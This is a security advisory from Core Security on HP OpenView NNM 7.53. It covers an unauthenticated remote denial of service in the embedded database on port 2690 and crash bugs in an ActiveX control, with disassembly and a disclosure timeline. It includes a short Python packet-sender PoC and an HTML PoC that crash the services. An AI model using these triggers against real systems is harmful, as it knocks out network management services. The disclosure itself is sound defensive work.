-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ HP Openview NNM 7.53 Invalid DB Error Code vulnerability 1. *Advisory Information* Title: HP Openview NNM 7.53 Invalid DB Error Code vulnerability Advisory Id: CORE-2009-0814 Advisory URL: http://www.coresecurity.com/content/openview_nnm_internaldb_dos Date published: 2009-11-17 Date of last update: 2009-11-17 Vendors contacted: HP Release mode: Coordinated release 2. *Vulnerability Information* Class: External Initialization of Trusted Variables [CWE-454] Impact: Denial of Service Remotely Exploitable: Yes Locally Exploitable: No Bugtraq ID: N/A CVE Name: CVE-2009-3840 3. *Vulnerability Description* HP Openview Network Node Manager is one of the most widely-deployed network monitoring and management platforms used throughout enterprise organizations today. The platform includes many server and client-side core components with a long list of previously disclosed security bugs. In this case, a remotely exploitable vulnerability was found in the database server core component used by NNM. Exploitation of the bug does not require authentication and will lead to a remotely triggered denial of service of the internal database service. 4. *Vulnerable packages* . HP Openview NNM 7.53 Other versions may be vulnerable but were not tested. Refer to the vendor's security bulletin for a full list. 5. *Non-vulnerable packages* Refer to the vendor's security bulletin. 6. *Vendor Information, Solutions and Workarounds* The vendor issued security bulletin HPSBMA02477 SSRT090177 to address the problem and provide fixes. It is available at http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01926980 The database service of HP Openview Network Node Manager is remotely accessible on port 2690/tcp. Restricting or blocking access to that port will prevent exploitation but may prevent normal operation of Openview NNM. 7. *Credits* This vulnerability was discovered and researched by Damian Frizza from Core Security Technologies. 8. *Technical Description / Proof of Concept Code* 8.1. *HP Openview NNM 7.53 Embedded DB Remote Denial Of Service* HP Openview Network Node Manager includes an embedded database engine service that is enabled by default and accepts remote connections on port 2690/tcp. The service is implemented by the 'ovdbrun.exe' which is started automatically on boot. For certain transactions upon receiving a packet from the network the service will attempt to determine and display an error code string based on an error code number specified in the packet. By sending a specifically crafted packet with an invalid error code number it is possible to remotely trigger an exception that forces abnormal termination of the service. It is unlikely that the bug could be exploited for anything other than a remote denial of service. The following code excerpt explains the problem: /----- 005FED51 MOVZX EDX,BYTE PTR SS:[ESP+2] #FCFF 005FED56 MOVSX ECX,WORD PTR SS:[ESP+3] 005FED5B CMP ECX,-1 005FED5E MOVSX EAX,WORD PTR SS:[ESP+5] #FCFF 005FED63 MOV DWORD PTR DS:[ESI+10],EDX 005FED66 MOV EDX,DWORD PTR SS:[ESP+7] 005FED6A MOV DWORD PTR DS:[ESI+14],ECX 005FED6D MOV DWORD PTR DS:[ESI+18],EAX 005FED70 MOV DWORD PTR DS:[ESI+C],EDX 005FED73 JGE SHORT ovdbrun.005FED7E 005FED75 CMP EAX,-1 005FED78 JGE SHORT ovdbrun.005FED7E 005FED7A CMP ECX,EAX 005FED7C JE SHORT ovdbrun.005FED83 005FED7E MOV EAX,1 005FED83 ADD ESP,0C 005FED86 RETN - -----/ The code above checks for an error condition based on the value of an Error Code field in the inbound network packet. An error condition is explicitly handled if the Error Code value is less or equal than -1 in which case a MessageBox with a corresponding descriptive error string will be presented to the user. However by crafting a packet with any negative value in the Error Code field different that -1 the lookup for the corresponding error string will fail triggering a non-recoverable error and thus terminating the server process. The following python code can be used to reproduce the bug: /----- #!python import socket import struct a = struct.pack('<b', 2) a += struct.pack('<H', 0) a += struct.pack('<H',0xFEFF) a += struct.pack('<H',0xFEFF) a += "1234" target_ip = 'X.X.X.X' s = socket.socket (socket.AF_INET, socket.SOCK_STREAM) s.connect ((target_ip, 2690)) s.send(a) s.close() - -----/ 8.2. *Additional information: Low severity bugs in ActiveDom.ocx ActiveX* The ActiveX control 'ActiveDom.ocx' is shipped with HP Openview NNM 7.53 and installed by default. The control is prone to multiple memory corruption bugs due to erroneous handling of overly long strings passed to multiple methods. These bugs are considered of low severity because the control is not configured as Safe for Scripting or Safe for Initialization [1] and therefore cannot be exploited without explicit user consent. Since the control was reported by the vendor as not used nor required by any component of OpenView NNM, finding deployed systems with security configuration settings changed to allow exploitation of these bugs is very unlikely. Nonetheless information about them is included below for the purpose of completeness in the documentation of this advisory. Some of the ActiveX control's methods with implementation flaws are: /----- DisplayName(str) AddGroup(str) InstallComponent(str) Subscribe(str, str, int) - -----/ The following excerpt from method DisplayName() demonstrates the problem: /----- 2000D408 MOV DWORD PTR SS:[EBP-4],-1 2000D40F JMP SHORT ACTIVE~1.2000D3D6 2000D411 MOV EAX,ACTIVE~1.200361A0 2000D416 JMP <JMP.&MSVCRT.__CxxFrameHandler> 2000D41B MOV EAX,ACTIVE~1.2000D4A8 2000D420 CALL <JMP.&MSVCRT._EH_prolog> 2000D425 SUB ESP,10 2000D428 PUSH EBX 2000D429 PUSH ESI 2000D42A PUSH EDI 2000D42B MOV DWORD PTR SS:[EBP-10],ESP 2000D42E MOV DWORD PTR SS:[EBP-14],ECX 2000D431 XOR EBX,EBX 2000D433 MOV DWORD PTR SS:[EBP-4],EBX 2000D436 LEA ESI,DWORD PTR DS:[ECX+28] 2000D439 MOV ECX,DWORD PTR DS:[ESI] ; ESI = 00038178 2000D43B MOV EAX,DWORD PTR DS:[ECX] ; 2000D43D CALL DWORD PTR DS:[EAX+48] ; - -----/ The following HTML code can be used to trigger the bug: /----- <html> <object classid='clsid:A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE' id='target' ></object> <script> a = "" for (i = 0; i < 10000; i++) a = a + "A" target.DisplayName(a) </script> </html> - -----/ 9. *Report Timeline* . 2009-08-12: Core Security Technologies notifies the HP Software Security Response Team (SSRT) of the vulnerability and preliminary schedule to publish the corresponding security advisory on September 8th 2009. Core asks for acknowledgement of the email within 2 working days and whether HP SSRT prefers to receive the technical description of the bug encrypted or in plaintext. . 2009-08-12: HP SSRT asks Core to send the technical description of the vulnerability encrypted using the PGP key with id 0x08B83D45. . 2009-08-14: Core Security Technologies sends technical details encrypted to HP SSRT. . 2009-08-18: HP SSRT informs Core that HP engineering have been notified and will notify Core when they have a schedule estimate. SSRT assigned the IDs SSRT090177 and SSRT090178 to the vulnerabilities reported by Core. . 2009-08-27: Core requests a status update from HP SSRT. . 2009-08-27: HP SSRT informs Core that the vulnerabilities are in third-party code and that the third-party vendor has been notified but there isn't a schedule for fixes yet. HP SSRT indicates that it is sure HP will not have a solution ready by September 7th. . 2009-08-27: Core informs the HP team that the publication was re-scheduled to September 21st and requests an update to continue coordinating the release of fixes and publication of the advisory as soon as possible. . 2009-08-28: The HP team informs Core that the third party if planning a release on October 30th for the first vulnerability. SSRT also notes that ActiveX vulnerabilities are still being investigated. . 2009-08-31: Core Security Technologies acknowledges the information sent by HP SSRT. . 2009-09-01: The HP team communicates that they will inform Core Security Technologies when the fix is available. . 2009-09-04: Core asks the HP SSRT to map HP's internal IDs to each of the reported vulnerability. . 2009-09-04: The HP SSRT indicates that SSRT090177 corresponds to the embedded database vulnerability and SSRT090178 to the ActiveX bugs. . 2009-09-10: Core Security Technologies notifies HP SSRT that publication of the advisory has been re-scheduled to October 30th to be able to coordinate the release with the issuance of fixes by the third party vendor and that if non-third-party vulnerabilities (the ActiveX bugs) could be fixed earlier they would be described in a separate advisory. . 2009-09-11: HP SSRT says that it will send any new information to Core on the ActiveX bugs if they have something to publish before October 30th. . 2009-09-21: The HP team informs Core that they are having some problems reproducing the ActiveX vulnerabilities reported. The NNM engineers have used the provided proof-of-concept exploit but did not see any effect. SSRT asks if an overflow was confirmed, if process failure was detected and if a debugger or a different procedure was used. . 2009-09-21: Core Security Technologies notifies the HP SSRT that the proof of concept crash can be observed using a classic debugger or a just-in-time debugger that is attached only after an abnormal exception is detected. Core also sends HP SSRT another proof of concept HTML code that crashes the ActiveX and can be observed without the need of a debugger. . 2009-09-22: The HP team acknowledges previous email from Core with the new PoC to reproduce the crashes without a debugger. . 2009-10-06: Core requests a status update from the SSRT noting that it hasn't received any update since September 22nd. The advisory is still scheduled for publication on October 30th and Core is waiting for confirmation that the ActiveX bugs were reproduced and the fix for them could be published earlier separately. . 2009-10-09: SSRT updates indicating that fixes from the third party for SSRT090177 have been received and HP is currently in the process of testing them on all platforms expecting an update by October 16th. The ActiveX bugs have been reproduced and HP determined that the vulnerable control is not necessary for NNM. HP will recommend customers to set the kill bit for the control (clsid:A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE) as workaround. . 2009-10-19: Core requests a status update and confirmation that HP will be ready to release fixes by October 30th. Core asks if fixes will be issued for all vulnerable versions of NNM, whether the fixes or patches will remove the unnecessary ActiveX control or just ask customers to implement the workaround. Core requests the complete lists of vulnerable versions and platforms of NNM and asks if the patches will include fixes to other bugs. Also, Core notes that the vendor of the third party component has been identified and that since the bug may affect other products Core will start a separate vulnerability report process directly with that vendor. . 2009-11-02: Email from Core asking for a status update and an acknowledgement and response to the questions from the previous email. Core notes that the previously agreed publication date for the advisory has already passed without any update from HP. The publication date has been unilaterally moved to Wednesday November 4th. 2009 and is considered final pending a response from HP. . 2009-11-03: Response from HP SSRT stating that there is not an estimated release date for patches to some platforms. With regards to the ActiveX bugs, a security bulletin will be published on November 9th recommending setting the kill bit. . 2009-11-03: Core indicates that since there isn't an estimated patch release date for missing platforms the advisory will be published on November 9th and will include guidance on how to implement workarounds for both problems. Core asks SSRT about the potential impact of blocking or restricting access to the vulnerable service as a workaround. . 2009-11-05: SSRT suggests that given that Core advisory will be published earlier than HP's security bulletin it should have workarounds for all platforms and not just for the ones that may not have a patch available afterwards. HP is still investigating the impact of blocking or restricting access to the vulnerable port. SSRT asks if Core wants any acknowledgement in its security bulletin . 2009-11-05: Core asks what is the planned publication date for HP's bulletin and requests that the bulletin credits the discoverer (Damian Frizza). Provided that the estimated date for publishing the bulletin is not unreasonable Core would rather schedule the publication of the advisory to match HP's. . 2009-11-06: SSRT informs that their estimate is to have hotfixes available internally by November 13th and released along with the corresponding security bulletins by November 17th. SSRT ask whether CVE numbers should be assigned by HP or provided by Core. . 2009-11-06: Core re-schedules publication to November 17th. Core asks SSRT to assign the CVE numbers. . 2009-11-12: HP SSRT reports that the ActiveX control is not marked as safe for scripting or safe for initialization by default and thus the buffer overflows in its methods do not seem to be security issues. Asks if Core still considers them security vulnerabilities. . 2009-11-16: HP SSRT provides the CVE id assigned to the denial of service bug. Indicates that the vendor's security bulletin will not suggest any workarounds as the effect of blocking or restricting access to the vulnerable service has not been determined. . 2009-11-16: Core confirms that the ActiveX control is not marked as safe for scripting or initialization which greatly diminishes the relevance of the reported bugs. Nonetheless, the information about the bugs will be included in the advisory for the purpose of completeness and to let users verify, and if necessary correct, the control's configuration settings. Core still recommends the vendor to remove the unnecessary control from installation packages and fix the reported bugs to avoid potential introduction of flaws if it becomes a used control in the future or should an alternative exploitation vector be found. . 2009-11-17: Publication of HP Security Bulletin SSRT090177. . 2009-11-17: Advisory CORE-2009-0814 published. 10. *References* [1] Safe Initialization and Scripting for ActiveX Controls. http://msdn.microsoft.com/en-us/library/aa751977(VS.85).aspx [2] How to stop an ActiveX control from running in Internet Explorer. http://support.microsoft.com/kb/240797 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAksDICYACgkQyNibggitWa2//ACdFpN6SK4B59Iza5Nq88oASfat YhoAn24UcNlJ/lpKv4brl4d6mctKfwMF =cR49 -----END PGP SIGNATURE-----